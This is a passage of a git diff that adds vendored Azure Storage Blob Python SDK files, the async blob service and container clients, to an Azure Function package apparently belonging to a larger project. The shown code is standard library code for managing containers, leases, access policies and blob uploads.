self.get_container_client(name) + timeout = kwargs.pop('timeout', None) + kwargs.setdefault('merge_span', True) + await container.create_container( + metadata=metadata, public_access=public_access, timeout=timeout, **kwargs) + return container + + @distributed_trace_async + async def delete_container( + self, container, # type: Union[ContainerProperties, str] + lease=None, # type: Optional[Union[BlobLeaseClient, str]] + **kwargs + ): + # type: (...) -> None + """Marks the specified container for deletion. + + The container and any blobs contained within it are later deleted during garbage collection. + If the container is not found, a ResourceNotFoundError will be raised. + + :param container: + The container to delete. This can either be the name of the container, + or an instance of ContainerProperties. + :type container: str or ~azure.storage.blob.ContainerProperties + :param lease: + If specified, delete_container only succeeds if the + container's lease is active and matches this ID. + Required if the container has an active lease. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START bsc_delete_container] + :end-before: [END bsc_delete_container] + :language: python + :dedent: 16 + :caption: Deleting a container in the blob service. + """ + container = self.get_container_client(container) # type: ignore + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + await container.delete_container( # type: ignore + lease=lease, + timeout=timeout, + **kwargs) + + @distributed_trace_async + async def _rename_container(self, name, new_name, **kwargs): + # type: (str, str, **Any) -> ContainerClient + """Renames a container. + + Operation is successful only if the source container exists. + + :param str name: + The name of the container to rename. + :param str new_name: + The new container name the user wants to rename to. + :keyword lease: + Specify this to perform only if the lease ID given + matches the active lease ID of the source container. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: ~azure.storage.blob.ContainerClient + """ + renamed_container = self.get_container_client(new_name) + lease = kwargs.pop('lease', None) + try: + kwargs['source_lease_id'] = lease.id # type: str + except AttributeError: + kwargs['source_lease_id'] = lease + try: + await renamed_container._client.container.rename(name, **kwargs) # pylint: disable = protected-access + return renamed_container + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def undelete_container(self, deleted_container_name, deleted_container_version, **kwargs): + # type: (str, str, **Any) -> ContainerClient + """Restores soft-deleted container. + + Operation will only be successful if used within the specified number of days + set in the delete retention policy. + + .. versionadded:: 12.4.0 + This operation was introduced in API version '2019-12-12'. + + :param str deleted_container_name: + Specifies the name of the deleted container to restore. + :param str deleted_container_version: + Specifies the version of the deleted container to restore. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: ~azure.storage.blob.aio.ContainerClient + """ + new_name = kwargs.pop('new_name', None) + if new_name: + warnings.warn("`new_name` is no longer supported.", DeprecationWarning) + container = self.get_container_client(new_name or deleted_container_name) + try: + await container._client.container.restore(deleted_container_name=deleted_container_name, # pylint: disable = protected-access + deleted_container_version=deleted_container_version, + timeout=kwargs.pop('timeout', None), **kwargs) + return container + except HttpResponseError as error: + process_storage_error(error) + + def get_container_client(self, container): + # type: (Union[ContainerProperties, str]) -> ContainerClient + """Get a client to interact with the specified container. + + The container need not already exist. + + :param container: + The container. This can either be the name of the container, + or an instance of ContainerProperties. + :type container: str or ~azure.storage.blob.ContainerProperties + :returns: A ContainerClient. + :rtype: ~azure.storage.blob.aio.ContainerClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START bsc_get_container_client] + :end-before: [END bsc_get_container_client] + :language: python + :dedent: 12 + :caption: Getting the container client to interact with a specific container. + """ + try: + container_name = container.name + except AttributeError: + container_name = container + _pipeline = AsyncPipeline( + transport=AsyncTransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + return ContainerClient( + self.url, container_name=container_name, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) + + def get_blob_client( + self, container, # type: Union[ContainerProperties, str] + blob, # type: Union[BlobProperties, str] + snapshot=None # type: Optional[Union[Dict[str, Any], str]] + ): + # type: (...) -> BlobClient + """Get a client to interact with the specified blob. + + The blob need not already exist. + + :param container: + The container that the blob is in. This can either be the name of the container, + or an instance of ContainerProperties. + :type container: str or ~azure.storage.blob.ContainerProperties + :param blob: + The blob with which to interact. This can either be the name of the blob, + or an instance of BlobProperties. + :type blob: str or ~azure.storage.blob.BlobProperties + :param snapshot: + The optional blob snapshot on which to operate. This can either be the ID of the snapshot, + or a dictionary output returned by + :func:`~azure.storage.blob.aio.BlobClient.create_snapshot()`. + :type snapshot: str or dict(str, Any) + :returns: A BlobClient. + :rtype: ~azure.storage.blob.aio.BlobClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START bsc_get_blob_client] + :end-before: [END bsc_get_blob_client] + :language: python + :dedent: 16 + :caption: Getting the blob client to interact with a specific blob. + """ + try: + container_name = container.name + except AttributeError: + container_name = container + + try: + blob_name = blob.name + except AttributeError: + blob_name = blob + _pipeline = AsyncPipeline( + transport=AsyncTransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + return BlobClient( # type: ignore + self.url, container_name=container_name, blob_name=blob_name, snapshot=snapshot, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=_pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_container_client_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_container_client_async.py new file mode 100644 index 0000000..51822cd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_container_client_async.py @@ -0,0 +1,1266 @@ +# pylint: disable=too-many-lines +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=invalid-overridden-method +import functools +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, AnyStr, Dict, List, IO, AsyncIterator, + TYPE_CHECKING +) + +from azure.core.exceptions import HttpResponseError, ResourceNotFoundError +from azure.core.tracing.decorator import distributed_trace +from azure.core.tracing.decorator_async import distributed_trace_async +from azure.core.async_paging import AsyncItemPaged +from azure.core.pipeline import AsyncPipeline +from azure.core.pipeline.transport import AsyncHttpResponse + +from .._shared.base_client_async import AsyncStorageAccountHostsMixin, AsyncTransportWrapper +from .._shared.policies_async import ExponentialRetry +from .._shared.request_handlers import add_metadata_headers, serialize_iso +from .._shared.response_handlers import ( + process_storage_error, + return_response_headers, + return_headers_and_deserialized) +from .._generated.aio import AzureBlobStorage +from .._generated.models import SignedIdentifier +from .._deserialize import deserialize_container_properties +from .._serialize import get_modify_conditions, get_container_cpk_scope_info, get_api_version, get_access_conditions +from .._container_client import ContainerClient as ContainerClientBase, _get_blob_name +from .._models import ContainerProperties, BlobType, BlobProperties, FilteredBlob # pylint: disable=unused-import +from ._list_blobs_helper import BlobPropertiesPaged, BlobPrefix +from ._lease_async import BlobLeaseClient +from ._blob_client_async import BlobClient +from ._models import FilteredBlobPaged + +if TYPE_CHECKING: + from .._models import PublicAccess + from ._download_async import StorageStreamDownloader + from datetime import datetime + from .._models import ( # pylint: disable=unused-import + AccessPolicy, + StandardBlobTier, + PremiumPageBlobTier) + + +class ContainerClient(AsyncStorageAccountHostsMixin, ContainerClientBase): + """A client to interact with a specific container, although that container + may not yet exist. + + For operations relating to a specific blob within this container, a blob client can be + retrieved using the :func:`~get_blob_client` function. + + :param str account_url: + The URI to the storage account. In order to create a client given the full URI to the container, + use the :func:`from_container_url` classmethod. + :param container_name: + The name of the container for the blob. + :type container_name: str + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword str api_version: + The Storage API version to use for requests. Default value is the most recent service version that is + compatible with the current SDK. Setting to an older version may result in reduced feature compatibility. + + .. versionadded:: 12.2.0 + + :keyword str secondary_hostname: + The hostname of the secondary endpoint. + :keyword int max_block_size: The maximum chunk size for uploading a block blob in chunks. + Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_put_size: If the blob size is less than or equal max_single_put_size, then the blob will be + uploaded with only one http PUT request. If the blob size is larger than max_single_put_size, + the blob will be uploaded in chunks. Defaults to 64*1024*1024, or 64MB. + :keyword int min_large_block_upload_threshold: The minimum chunk size required to use the memory efficient + algorithm when uploading a block blob. Defaults to 4*1024*1024+1. + :keyword bool use_byte_buffer: Use a byte buffer for block blob uploads. Defaults to False. + :keyword int max_page_size: The maximum chunk size for uploading a page blob. Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_get_size: The maximum size for a blob to be downloaded in a single call, + the exceeded part will be downloaded in chunks (could be parallel). Defaults to 32*1024*1024, or 32MB. + :keyword int max_chunk_get_size: The maximum chunk size used for downloading a blob. Defaults to 4*1024*1024, + or 4MB. + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START create_container_client_from_service] + :end-before: [END create_container_client_from_service] + :language: python + :dedent: 8 + :caption: Get a ContainerClient from an existing BlobServiceClient. + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START create_container_client_sasurl] + :end-before: [END create_container_client_sasurl] + :language: python + :dedent: 12 + :caption: Creating the container client directly. + """ + def __init__( + self, account_url, # type: str + container_name, # type: str + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> None + kwargs['retry_policy'] = kwargs.get('retry_policy') or ExponentialRetry(**kwargs) + super(ContainerClient, self).__init__( + account_url, + container_name=container_name, + credential=credential, + **kwargs) + self._client = AzureBlobStorage(self.url, base_url=self.url, pipeline=self._pipeline) + self._client._config.version = get_api_version(kwargs) # pylint: disable=protected-access + + @distributed_trace_async + async def create_container(self, metadata=None, public_access=None, **kwargs): + # type: (Optional[Dict[str, str]], Optional[Union[PublicAccess, str]], **Any) -> Dict[str, Union[str, datetime]] + """ + Creates a new container under the specified account. If the container + with the same name already exists, the operation fails. + + :param metadata: + A dict with name_value pairs to associate with the + container as metadata. Example:{'Category':'test'} + :type metadata: dict[str, str] + :param ~azure.storage.blob.PublicAccess public_access: + Possible values include: 'container', 'blob'. + :keyword container_encryption_scope: + Specifies the default encryption scope to set on the container and use for + all future writes. + + .. versionadded:: 12.2.0 + + :paramtype container_encryption_scope: dict or ~azure.storage.blob.ContainerEncryptionScope + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: A dictionary of response headers. + :rtype: Dict[str, Union[str, datetime]] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START create_container] + :end-before: [END create_container] + :language: python + :dedent: 16 + :caption: Creating a container to store blobs. + """ + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) # type: ignore + timeout = kwargs.pop('timeout', None) + container_cpk_scope_info = get_container_cpk_scope_info(kwargs) + try: + return await self._client.container.create( # type: ignore + timeout=timeout, + access=public_access, + container_cpk_scope_info=container_cpk_scope_info, + cls=return_response_headers, + headers=headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def _rename_container(self, new_name, **kwargs): + # type: (str, **Any) -> ContainerClient + """Renames a container. + + Operation is successful only if the source container exists. + + :param str new_name: + The new container name the user wants to rename to. + :keyword lease: + Specify this to perform only if the lease ID given + matches the active lease ID of the source container. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: ~azure.storage.blob.ContainerClient + """ + lease = kwargs.pop('lease', None) + try: + kwargs['source_lease_id'] = lease.id # type: str + except AttributeError: + kwargs['source_lease_id'] = lease + try: + renamed_container = ContainerClient( + "{}://{}".format(self.scheme, self.primary_hostname), container_name=new_name, + credential=self.credential, api_version=self.api_version, _configuration=self._config, + _pipeline=self._pipeline, _location_mode=self._location_mode, _hosts=self._hosts, + require_encryption=self.require_encryption, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) + await renamed_container._client.container.rename(self.container_name, **kwargs) # pylint: disable = protected-access + return renamed_container + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def delete_container( + self, **kwargs): + # type: (Any) -> None + """ + Marks the specified container for deletion. The container and any blobs + contained within it are later deleted during garbage collection. + + :keyword lease: + If specified, delete_container only succeeds if the + container's lease is active and matches this ID. + Required if the container has an active lease. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START delete_container] + :end-before: [END delete_container] + :language: python + :dedent: 16 + :caption: Delete a container. + """ + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + mod_conditions = get_modify_conditions(kwargs) + timeout = kwargs.pop('timeout', None) + try: + await self._client.container.delete( + timeout=timeout, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def acquire_lease( + self, lease_duration=-1, # type: int + lease_id=None, # type: Optional[str] + **kwargs): + # type: (...) -> BlobLeaseClient + """ + Requests a new lease. If the container does not have an active lease, + the Blob service creates a lease on the container and returns a new + lease ID. + + :param int lease_duration: + Specifies the duration of the lease, in seconds, or negative one + (-1) for a lease that never expires. A non-infinite lease can be + between 15 and 60 seconds. A lease duration cannot be changed + using renew or change. Default is -1 (infinite lease). + :param str lease_id: + Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: A BlobLeaseClient object, that can be run in a context manager. + :rtype: ~azure.storage.blob.aio.BlobLeaseClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START acquire_lease_on_container] + :end-before: [END acquire_lease_on_container] + :language: python + :dedent: 12 + :caption: Acquiring a lease on the container. + """ + lease = BlobLeaseClient(self, lease_id=lease_id) # type: ignore + kwargs.setdefault('merge_span', True) + timeout = kwargs.pop('timeout', None) + await lease.acquire(lease_duration=lease_duration, timeout=timeout, **kwargs) + return lease + + @distributed_trace_async + async def get_account_information(self, **kwargs): + # type: (**Any) -> Dict[str, str] + """Gets information related to the storage account. + + The information can also be retrieved if the user has a SAS to a container or blob. + The keys in the returned dictionary include 'sku_name' and 'account_kind'. + + :returns: A dict of account information (SKU and account type). + :rtype: dict(str, str) + """ + try: + return await self._client.container.get_account_info(cls=return_response_headers, **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def get_container_properties(self, **kwargs): + # type: (**Any) -> ContainerProperties + """Returns all user-defined metadata and system properties for the specified + container. The data returned does not include the container's list of blobs. + + :keyword lease: + If specified, get_container_properties only succeeds if the + container's lease is active and matches this ID. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: Properties for the specified container within a container object. + :rtype: ~azure.storage.blob.ContainerProperties + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START get_container_properties] + :end-before: [END get_container_properties] + :language: python + :dedent: 16 + :caption: Getting properties on the container. + """ + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + timeout = kwargs.pop('timeout', None) + try: + response = await self._client.container.get_properties( + timeout=timeout, + lease_access_conditions=access_conditions, + cls=deserialize_container_properties, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + response.name = self.container_name + return response # type: ignore + + @distributed_trace_async + async def exists(self, **kwargs): + # type: (**Any) -> bool + """ + Returns True if a container exists and returns False otherwise. + + :kwarg int timeout: + The timeout parameter is expressed in seconds. + :returns: boolean + """ + try: + await self._client.container.get_properties(**kwargs) + return True + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceNotFoundError: + return False + + @distributed_trace_async + async def set_container_metadata( # type: ignore + self, metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime]] + """Sets one or more user-defined name-value pairs for the specified + container. Each call to this operation replaces all existing metadata + attached to the container. To remove all metadata from the container, + call this operation with no metadata dict. + + :param metadata: + A dict containing name-value pairs to associate with the container as + metadata. Example: {'category':'test'} + :type metadata: dict[str, str] + :keyword lease: + If specified, set_container_metadata only succeeds if the + container's lease is active and matches this ID. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Container-updated property dict (Etag and last modified). + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START set_container_metadata] + :end-before: [END set_container_metadata] + :language: python + :dedent: 16 + :caption: Setting metadata on the container. + """ + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + mod_conditions = get_modify_conditions(kwargs) + timeout = kwargs.pop('timeout', None) + try: + return await self._client.container.set_metadata( # type: ignore + timeout=timeout, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + headers=headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def _get_blob_service_client(self): # pylint: disable=client-method-missing-kwargs + # type: (...) -> BlobServiceClient + """Get a client to interact with the container's parent service account. + + Defaults to current container's credentials. + + :returns: A BlobServiceClient. + :rtype: ~azure.storage.blob.BlobServiceClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START get_blob_service_client_from_container_client] + :end-before: [END get_blob_service_client_from_container_client] + :language: python + :dedent: 8 + :caption: Get blob service client from container object. + """ + from ._blob_service_client_async import BlobServiceClient + if not isinstance(self._pipeline._transport, AsyncTransportWrapper): # pylint: disable = protected-access + _pipeline = AsyncPipeline( + transport=AsyncTransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + else: + _pipeline = self._pipeline # pylint: disable = protected-access + return BlobServiceClient( + "{}://{}".format(self.scheme, self.primary_hostname), + credential=self._raw_credential, api_version=self.api_version, _configuration=self._config, + _location_mode=self._location_mode, _hosts=self._hosts, require_encryption=self.require_encryption, + key_encryption_key=self.key_encryption_key, key_resolver_function=self.key_resolver_function, + _pipeline=_pipeline) + + + @distributed_trace_async + async def get_container_access_policy(self, **kwargs): + # type: (Any) -> Dict[str, Any] + """Gets the permissions for the specified container. + The permissions indicate whether container data may be accessed publicly. + + :keyword lease: + If specified, get_container_access_policy only succeeds if the + container's lease is active and matches this ID. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Access policy information in a dict. + :rtype: dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START get_container_access_policy] + :end-before: [END get_container_access_policy] + :language: python + :dedent: 16 + :caption: Getting the access policy on the container. + """ + lease = kwargs.pop('lease', None) + access_conditions = get_access_conditions(lease) + timeout = kwargs.pop('timeout', None) + try: + response, identifiers = await self._client.container.get_access_policy( + timeout=timeout, + lease_access_conditions=access_conditions, + cls=return_headers_and_deserialized, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + return { + 'public_access': response.get('blob_public_access'), + 'signed_identifiers': identifiers or [] + } + + @distributed_trace_async + async def set_container_access_policy( + self, signed_identifiers, # type: Dict[str, AccessPolicy] + public_access=None, # type: Optional[Union[str, PublicAccess]] + **kwargs # type: Any + ): # type: (...) -> Dict[str, Union[str, datetime]] + """Sets the permissions for the specified container or stored access + policies that may be used with Shared Access Signatures. The permissions + indicate whether blobs in a container may be accessed publicly. + + :param signed_identifiers: + A dictionary of access policies to associate with the container. The + dictionary may contain up to 5 elements. An empty dictionary + will clear the access policies set on the service. + :type signed_identifiers: dict[str, ~azure.storage.blob.AccessPolicy] + :param ~azure.storage.blob.PublicAccess public_access: + Possible values include: 'container', 'blob'. + :keyword lease: + Required if the container has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A datetime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified date/time. + :keyword ~datetime.datetime if_unmodified_since: + A datetime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Container-updated property dict (Etag and last modified). + :rtype: dict[str, str or ~datetime.datetime] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START set_container_access_policy] + :end-before: [END set_container_access_policy] + :language: python + :dedent: 16 + :caption: Setting access policy on the container. + """ + timeout = kwargs.pop('timeout', None) + lease = kwargs.pop('lease', None) + if len(signed_identifiers) > 5: + raise ValueError( + 'Too many access policies provided. The server does not support setting ' + 'more than 5 access policies on a single resource.') + identifiers = [] + for key, value in signed_identifiers.items(): + if value: + value.start = serialize_iso(value.start) + value.expiry = serialize_iso(value.expiry) + identifiers.append(SignedIdentifier(id=key, access_policy=value)) # type: ignore + signed_identifiers = identifiers # type: ignore + + mod_conditions = get_modify_conditions(kwargs) + access_conditions = get_access_conditions(lease) + try: + return await self._client.container.set_access_policy( + container_acl=signed_identifiers or None, + timeout=timeout, + access=public_access, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def list_blobs(self, name_starts_with=None, include=None, **kwargs): + # type: (Optional[str], Optional[Union[str, List[str]]], **Any) -> AsyncItemPaged[BlobProperties] + """Returns a generator to list the blobs under the specified container. + The generator will lazily follow the continuation tokens returned by + the service. + + :param str name_starts_with: + Filters the results to return only blobs whose names + begin with the specified prefix. + :param list[str] or str include: + Specifies one or more additional datasets to include in the response. + Options include: 'snapshots', 'metadata', 'uncommittedblobs', 'copy', 'deleted', 'deletedwithversions', + 'tags', 'versions'. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) response of BlobProperties. + :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.storage.blob.BlobProperties] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START list_blobs_in_container] + :end-before: [END list_blobs_in_container] + :language: python + :dedent: 12 + :caption: List the blobs in the container. + """ + if include and not isinstance(include, list): + include = [include] + + results_per_page = kwargs.pop('results_per_page', None) + timeout = kwargs.pop('timeout', None) + command = functools.partial( + self._client.container.list_blob_flat_segment, + include=include, + timeout=timeout, + **kwargs) + return AsyncItemPaged( + command, + prefix=name_starts_with, + results_per_page=results_per_page, + page_iterator_class=BlobPropertiesPaged + ) + + @distributed_trace + def walk_blobs( + self, name_starts_with=None, # type: Optional[str] + include=None, # type: Optional[Any] + delimiter="/", # type: str + **kwargs # type: Optional[Any] + ): + # type: (...) -> AsyncItemPaged[BlobProperties] + """Returns a generator to list the blobs under the specified container. + The generator will lazily follow the continuation tokens returned by + the service. This operation will list blobs in accordance with a hierarchy, + as delimited by the specified delimiter character. + + :param str name_starts_with: + Filters the results to return only blobs whose names + begin with the specified prefix. + :param list[str] include: + Specifies one or more additional datasets to include in the response. + Options include: 'snapshots', 'metadata', 'uncommittedblobs', 'copy', 'deleted'. + :param str delimiter: + When the request includes this parameter, the operation returns a BlobPrefix + element in the response body that acts as a placeholder for all blobs whose + names begin with the same substring up to the appearance of the delimiter + character. The delimiter may be a single character or a string. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) response of BlobProperties. + :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.storage.blob.BlobProperties] + """ + if include and not isinstance(include, list): + include = [include] + + results_per_page = kwargs.pop('results_per_page', None) + timeout = kwargs.pop('timeout', None) + command = functools.partial( + self._client.container.list_blob_hierarchy_segment, + delimiter=delimiter, + include=include, + timeout=timeout, + **kwargs) + return BlobPrefix( + command, + prefix=name_starts_with, + results_per_page=results_per_page, + delimiter=delimiter) + + @distributed_trace + def find_blobs_by_tags( + self, filter_expression, # type: str + **kwargs # type: Optional[Any] + ): + # type: (...) -> AsyncItemPaged[FilteredBlob] + """Returns a generator to list the blobs under the specified container whose tags + match the given search expression. + The generator will lazily follow the continuation tokens returned by + the service. + + :param str filter_expression: + The expression to find blobs whose tags matches the specified condition. + eg. "\"yourtagname\"='firsttag' and \"yourtagname2\"='secondtag'" + :keyword int results_per_page: + The max result per page when paginating. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) response of FilteredBlob. + :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.BlobProperties] + """ + results_per_page = kwargs.pop('results_per_page', None) + timeout = kwargs.pop('timeout', None) + command = functools.partial( + self._client.container.filter_blobs, + timeout=timeout, + where=filter_expression, + **kwargs) + return AsyncItemPaged( + command, results_per_page=results_per_page, + page_iterator_class=FilteredBlobPaged) + + @distributed_trace_async + async def upload_blob( + self, name, # type: Union[str, BlobProperties] + data, # type: Union[Iterable[AnyStr], IO[AnyStr]] + blob_type=BlobType.BlockBlob, # type: Union[str, BlobType] + length=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> BlobClient + """Creates a new blob from a data source with automatic chunking. + + :param name: The blob with which to interact. If specified, this value will override + a blob value specified in the blob URL. + :type name: str or ~azure.storage.blob.BlobProperties + :param data: The blob data to upload. + :param ~azure.storage.blob.BlobType blob_type: The type of the blob. This can be + either BlockBlob, PageBlob or AppendBlob. The default value is BlockBlob. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword bool overwrite: Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob will overwrite the existing data. If set to False, the + operation will fail with ResourceExistsError. The exception to the above is with Append + blob types: if set to False and the data already exists, an error will not be raised + and the data will be appended to the existing blob. If set overwrite=True, then the existing + append blob will be deleted, and a new one created. Defaults to False. + :keyword ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note 